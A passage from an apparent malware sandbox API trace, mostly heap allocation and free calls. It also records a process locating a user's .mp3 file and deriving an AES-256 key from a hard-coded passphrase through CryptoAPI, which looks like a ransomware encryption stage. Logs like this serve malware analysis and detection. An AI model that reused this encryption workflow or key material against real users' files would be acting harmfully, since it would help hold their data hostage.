hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.748] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.749] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.749] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0113.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.750] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0113.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0113.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0113.752] CloseHandle (hObject=0x258) returned 1 [0113.752] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.752] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0113.752] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab951be0, ftCreationTime.dwHighDateTime=0x1d5eb73, ftLastAccessTime.dwLowDateTime=0xf77c4470, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0xf77c4470, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x8156, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="WC8LUkBjI.mp3", cAlternateFileName="WC8LUK~1.MP3")) returned 0x41ac200 [0113.752] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0113.752] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0113.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.753] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a5360) returned 1 [0113.753] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0113.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.754] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0113.754] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.824] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.824] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0113.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.825] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.825] CryptHashData (hHash=0x41ac2c0, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0113.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.825] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac000) returned 1 [0113.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.825] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9bf0 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0113.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 